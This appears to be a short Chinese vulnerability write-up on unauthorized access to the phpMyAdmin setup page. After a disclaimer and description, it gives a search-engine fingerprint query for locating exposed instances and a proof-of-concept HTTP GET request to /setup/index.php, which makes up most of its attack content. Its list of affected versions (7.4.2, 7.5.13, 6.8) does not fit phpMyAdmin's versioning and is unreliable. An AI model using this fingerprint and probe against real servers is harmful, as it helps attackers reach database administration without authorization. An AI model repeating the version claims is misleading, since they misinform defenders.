phpmyadmin未授权访问漏洞
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
01—
漏洞名称
phpmyadmin未授权访问漏洞
02
—
影响版本
Linux正式版7.4.2、Linux测试版7.5.13、Windows正式版6.8等版本
03
漏洞简介
phpMyAdmin是一个广泛使用的开源数据库管理平台,主要用于管理和操作MySQL和MariaDB数据库。phpMyAdmin未授权访问漏洞是指攻击者无需经过身份验证,即可直接访问phpMyAdmin管理界面,从而获取数据库的读写权限,甚至可能进一步控制服务器的严重安全漏洞。
04
app="phpmyadmin"
05
漏洞复现
POC
GET /setup/index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116
Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Charset: utf-8
没有回复内容